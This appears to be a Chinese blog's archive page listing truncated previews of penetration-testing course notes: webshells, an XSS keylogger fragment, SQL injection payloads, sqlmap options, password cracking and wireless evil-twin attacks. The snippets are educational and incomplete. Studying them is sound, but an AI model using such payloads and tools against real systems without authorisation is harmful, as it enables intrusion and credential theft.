2017年09月_爱学习的小牛

原创【安全牛学习笔记】WEBSHELL

WEBSHELL 中国菜刀: http://www.maicaidao.co/ 可能被IDS、AV、WAF、扫描器软件发现查杀 WeBaCoo（WEB backdoor Cookie）

2017-09-30 15:46:51 1195

原创那些年我学渗透的故事

我12年毕业,学校里面学的是软件开发的专业，学习也不好.。之前寝室有个哥们姑且称为B哥给我们讲他以前干的“抓鸡,搞网吧的事情”,在我心中种下了一颗做安全的种子.。奈何他不愿意多说他的故事,毕业之后学校给我们找了一个装宽带的活，收入刚够吃饱,整天过的浑浑噩噩的。这样来到2014年，在这两年之内我业余时间都在网上找各种各样的教程,还有拜各种各样的师傅,其中被骗的

2017-09-30 15:40:56 444

原创【安全牛学习笔记】CSRF

CSRF Cross-site request forgery 与XSS经常混淆从信任的角度来区分 XSS：利用用户对站点的信任

2017-09-30 15:36:16 531

原创【安全牛学习笔记】存储型XSS和BEEF浏览器攻击框架

存储型XSS 长期存储于服务器端每次用于访问都会被执行javascript脚本 Name:客户端表单长度限制

2017-09-30 15:30:16 4896

原创【安全牛学习笔记】XSS- 键盘记录器和反射型XSS

XSS Keylogger.js document.onkeypress = function(evt){ evt = evt || window.event key = String.fromCharCode(evt.charCode) if(key){ var htt

2017-09-30 15:13:02 1094

原创【安全牛学习笔记】手动漏洞挖掘-SQL注入XSS-简介、跨站脚本检测和常见的攻击利用手段

XSS 攻击WEB客户端客户端脚本语言

2017-09-30 14:51:38 429

原创【安全牛学习笔记】SQLMAP自动注入-ENUMERATION、BRUTE FORCE、UDF INJECTION、FILE SYSTEM、OS、WINDOWS REGISTORY、GENERAL、M

伪静态页面不能注入，这是错误的！SQLMAP自动注入08-----ENUMERATION--current-user--current-db--hostname--users--privileges -U username (CU当前账号）--roles--dbs--tables,--exclude-sysdbs -D dvw

2017-09-30 14:31:55 456

原创【安全牛学习笔记】SQLMAP自动注入-INHECTION、DETECTION、TECHNIQUES、FINGERPRINT

SQLMAP自动注入04-----INJECTION-p 指定扫描的参数，使--level失效 -p "user-agent,referer"--skip 排除指定的扫描参数 --level=5 --skip="id,user-agent"URI注入点 sqlmap -u "http://targetur

2017-09-30 14:27:52 540

原创【安全牛学习笔记】课时94 SQLMAP自动注入-REQUEST和SQLMAP自动注入-OPTIMIZATION

SQLMAP自动注入02-----REQUEST--delay 每次http(s)请求之间延迟时间，浮点数，单位为秒,默认无延迟--timeout 请求超时时间，浮点数，默认为30秒--retries http(s)连接超时重试次数，默认3次--randomize 长度、类型与原始值保持一致的前提下，指定每次请

2017-09-30 14:25:35 395

原创【安全牛学习笔记】SQLMAP自动注入-REQUEST

SQLMAP自动注入-----REQUEST数据段： --data get/post都适用 sqlmap -u "http://1.1.1.1/a.php" --data="user=1&pass=2" -f变量分隔符：--param-del http://1.1.1.1/a.php?q=foo;id=1 // ; &

2017-09-30 14:22:53 418

转载考研太苦逼没坚持下来！看苑老师视频有点上头

很久以前,其实也没多久拉！那年大家兴考研，应该叫流行考研，太他娘苦逼了，又不想放弃，先放一放吧！找点有意思、兴趣大的东西学着，反正都是学，肯定有用的啦！我以为每个学计算机的人都有一个梦想——成为一名黑客。问同学 ,一股浓浓的东北普通话“嘛玩意？” 好吧，只有我一个人那么想的，于是开始大工程找书！余弦的WEB前端黑客技术揭秘！（有点高端没看懂！）道哥的白帽子讲WEB安全！（太高端了完全看

2017-09-28 14:26:44 3999 3

原创【安全牛学习笔记】SQLMAP- 自动注入

SQLMAP自动注入开源sql注入漏洞检测、利用工具检测动态页面中get/post参数、cookie、http头数据榨取文件系统访问操作系统命令执行引擎强大、特性丰富Xss漏洞检测------------------------------------------------------------------------------

2017-09-28 14:02:16 486

原创【安全牛学习笔记】手动漏洞挖掘-SQL盲注

手动漏洞挖掘-----SQL盲注不显示数据库内建的报错信息内建的报错信息帮助开发人员发现和修复问题报错信息提供关于系统的大量有用信息当程序员隐藏了数据库内建报错信息，替换为通用的错误提示，sql注入将无法依据报错信息判断注入语句的执行结果，即盲思路：既然无法基于报错信息判断结果，基于逻辑真假的不同结果来判断 1'and 1=1--+ 1

2017-09-28 13:58:56 356

原创【安全牛学习笔记】手动漏洞挖掘-SQL注入

手动漏洞挖掘-----SQL注入无权读取information_schema库 / 拒绝union、orderby语句猜列明: 'and column is null--+ Burp suite自动猜列名猜当前表表名: 'and table user is null--+ 猜库里其他表: 'and (select count(*) from

2017-09-28 13:56:45 490

原创【安全牛学习笔记】手动漏洞挖掘-SQL注入

root@kali:~# john --format=raw-MD5 dvwa.txtroot@kali:~# cd .john/root@kali:~/.john# lsjohn.log john.potroot@kali:~/.john# cat john.logroot@kali:~/.john# cat john.potroot@kali:~/.john# rm

2017-09-28 12:02:00 836

原创【安全牛学习笔记】KALI版本更新（第一个ROLLING RELEASE）和手动漏洞挖掘（SQL注入）

KALI版本更新-----第一个ROLLING RELEASEKali 2.0发布时声称将采用rolling release模式更新（但并未实施）Fixed-release 固定发布周期使用软件稳定的主流版本发布-----主流-----作废更稳定，适合于企业生产环境Rolling release

2017-09-28 11:59:02 302

原创【安全牛学习笔记】KALI版本更新（第一个ROLLING RELEASE）和手动漏洞挖掘（SQL注入）

KALI版本更新-----第一个ROLLING RELEASEKali 2.0发布时声称将采用rolling release模式更新（但并未实施）Fixed-release 固定发布周期使用软件稳定的主流版本发布-----主流-----作废更稳定，适合于企业生产环境Rolling release

2017-09-28 11:54:56 322

原创【安全牛学习笔记】手动漏洞挖掘（四）

手动漏洞挖掘本地文件包含lfi 查看文件代码执行 Apache access.log远程文件包含rfi 出现概率少于lfi，但更容易被利用 /usr/share/wfuzz/wordlist/vulns/手动漏洞挖掘文件上传漏洞直接上传

2017-09-28 11:47:46 214

原创【安全牛学习笔记】手动漏洞挖掘（三）

手动漏洞挖掘Directory travarsal / File include(有区别/没区别) 目录权限限制不严 / 文件包含/etc/php5/cgi/php.ini allow_url_include = on应用程序功能操作文件，限制不严时导致访问WEB目录以外的文件读、写文件、远程执行代码特征但不绝对

2017-09-28 11:35:19 354

原创【安全牛学习笔记】手动漏洞挖掘（二）

手动漏洞挖掘身份认证常用弱口令/基于字典的密码破爆破锁定账号信息收集手机号密码错误提示信息密码嗅探手动漏洞挖掘会话sessionID Xss / cookie importer SessionID in URL 嗅探

2017-09-28 11:33:20 584

原创【安全牛学习笔记】APPSCAN

APPSCNAWatchfire APPScan, 2007年被IBM收购，成为IBM APPScan扫描过程探索阶段测试阶段第一个过程发现新的URL地址，下一个扫描过程自动开始向导方式完全配置APPSCNAGlass box 相当于Acusensor Agent收集服务器端源

2017-09-28 11:22:26 998

原创【安全牛学习笔记】ACUNETIX WEB VULNERABILITY SCANNER

ACUNETIX WEB VULNERABILITY SCANNER自动手动爬网，支持AJAX、JavaScriptAcuSensor灰盒测试发现爬网无法发现文件额外的漏洞扫描可发现存在漏洞的源码行号支持PHP、.NET(不获取源码的情况下注入已编编译.NET)生成PCI、27001标准和规报告网络扫描

2017-09-27 18:07:20 1573

原创【安全牛学习笔记】Burpsuite-repeater，Sequencer，编码，代理截断工具

Burpsuite-----repeaterRepeater Request History Change request method Change body encoding Copy as curl command Convert selsction Repeater菜单 Eng

2017-09-26 18:24:18 599

原创【安全牛学习笔记】Burpsuite-intruder

BurpsuiteActive / Passive ScanExtender BApp Stroe .lython http://www.jython.org/downloads.html Option Scan queue ResultBurpstie------intru

2017-09-26 18:21:52 397

原创【安全牛学习笔记】Burpsuite

BurpsuiteWeb安全工具中的瑞士军刀统一的集成工具发现全部现代WEB安全漏洞PortSwigger公司开发 Burp Free Burp Professional http://www.portswigger.net所有的工具共享一个能处理并显示HTTP消息的可扩展框架,模块之间无缝交换信息。http:/

2017-09-26 18:16:31 331

原创【安全牛学习笔记】OWASP_ZAP

OWASP_ZAPZed attack proxyWEB Applicaiton集成渗透测试和漏洞挖掘工具开源免费跨平台简单易用截断代理主动、被动扫描Fuzzy、暴力破解API http://zap/Do you want to persist the ZAP Session Yes,I want to pe

2017-09-25 14:07:49 1215 1

原创【安全牛学习笔记】Arachni

root@kali:~# apt-get install kalikali kali-desktop-lxde kali-linux-pwtoolskali-archive-keyring kali-desktop-xfce kali-linux-rfidkalibrate-rtl kalign

2017-09-25 14:04:22 4291 2

原创【安全牛学习笔记】w3af-截断代理

W3af-----身份认证截断代理HTTP header file（另类的身份认证方法—）Accept - language: en-US,en;q=0.5Accept - encoding: gzip, deflateConnection：keep-aliveAccept: text/html,application/xhtml+xml,appl

2017-09-25 11:57:42 280

原创【安全牛学习笔记】w3af-身份认证

W3af-----身份认证 HTTP Basic NTLM Form

2017-09-25 11:53:32 282

原创【安全牛学习笔记】skipfish

skipfish C语言编写实验性的主动web安全评估工具递归爬网

2017-09-25 11:49:21 480

原创【安全牛学习笔记】w3af

w3af Web applicaiton Attack and Audit Framework,基于python语言开发此框架的目标是帮助你发现和利用所有WEB应用程序漏洞 9大类近plugin

2017-09-22 22:48:20 3118

原创【安全牛学习笔记】vega

vega JAVA编写的开源Web扫描器扫描模式代理模式爬站、处理表单、注入测试支持SSL:http://vega/ca/crt靶机IP地址:192

2017-09-22 22:47:04 585

原创【安全牛学习笔记】HTTP协议基础

WEB技术发展静态WEB 动态WEB 应用程序数据库每人看到的内容不同

2017-09-22 22:46:07 434

原创【安全牛学习笔记】AIRRACK-NG(二)

AIRTUN-NG Repeate WDS/Bridge

2017-09-22 22:17:06 857

原创【安全牛学习笔记】AIRRACK-NG SUITE

AIRRACK-NG SUITE 其他工具AIRDECAP-NG 去除802.11头 airdecap-ng -b 1.pcap

2017-09-22 22:09:04 420

转载我与牛的故事

结缘本人目前大三在校学生，第一次听到安全牛这个名字是在2017年初的一次信息安全讲座上。记得当时老师给我们推荐学习的网站的时候，第一个就是安全牛。初听此名觉得很稀奇为什么要叫安全牛呢。直到后来我觉得牛这个字取得恰如其分。相识第一次购课时，心里还是计较担心的，老师水平会不会不高？讲的知识是不是最新的？种种疑问从心里涌出。当时购买的是《kali linux渗透测试》讲师

2017-09-22 10:11:00 510

2016年，开始接触信息安全，之前，兴趣爱好一直是Linux运维，偶尔学一些数据库的内容，网络的也有学一部分，编程这部分，接触的并不深，后来，同学说，安全牛的kali课程很好，就想看看，当时没能赶上学生认证活动，就等到了院校团体的活动，学校组织一起报名了免费课程的学习，感觉，这才是对安全攻防的学习的一个开始，其中苑老师讲课真的很棒，对于kali这部分的一系列课程，对于新手来说，只要认真跟着学习，认

2017-09-22 10:06:52 916

原创【安全牛学习笔记】EVIL TWIN AP、ROGUE AP

EVIL TWIN AP / ROGUE AP 3vilTwinAttacker git clone https://github.com/P0cL4bs/3vilTwinAttacker.git cd 3

2017-09-22 01:36:53 1802

原创【安全牛学习笔记】WPS及其他工具

root@kali:~# service network-manager stoproot@kali:~# airmon-ng check killKilling these processes: PID Name 765 dhclient 988 wpa_supplicant先打上面的两个命令，把网卡映射到虚拟机，记住这个顺序root@kali:~# ifcon

2017-09-22 01:23:34 740

原创【安全牛学习笔记】WPS (WIRELESS PROTECTED SETUP)

WPS (WIRELESS PROTECTED SETUP) WPS是WiFi联盟2006年开放的一项技术通过PIN码来简化无线接入的操作，无需记住PSK 路由器

2017-09-22 00:44:50 1161

0-2020年-Security+认证招生简章-501.pdf

空空如也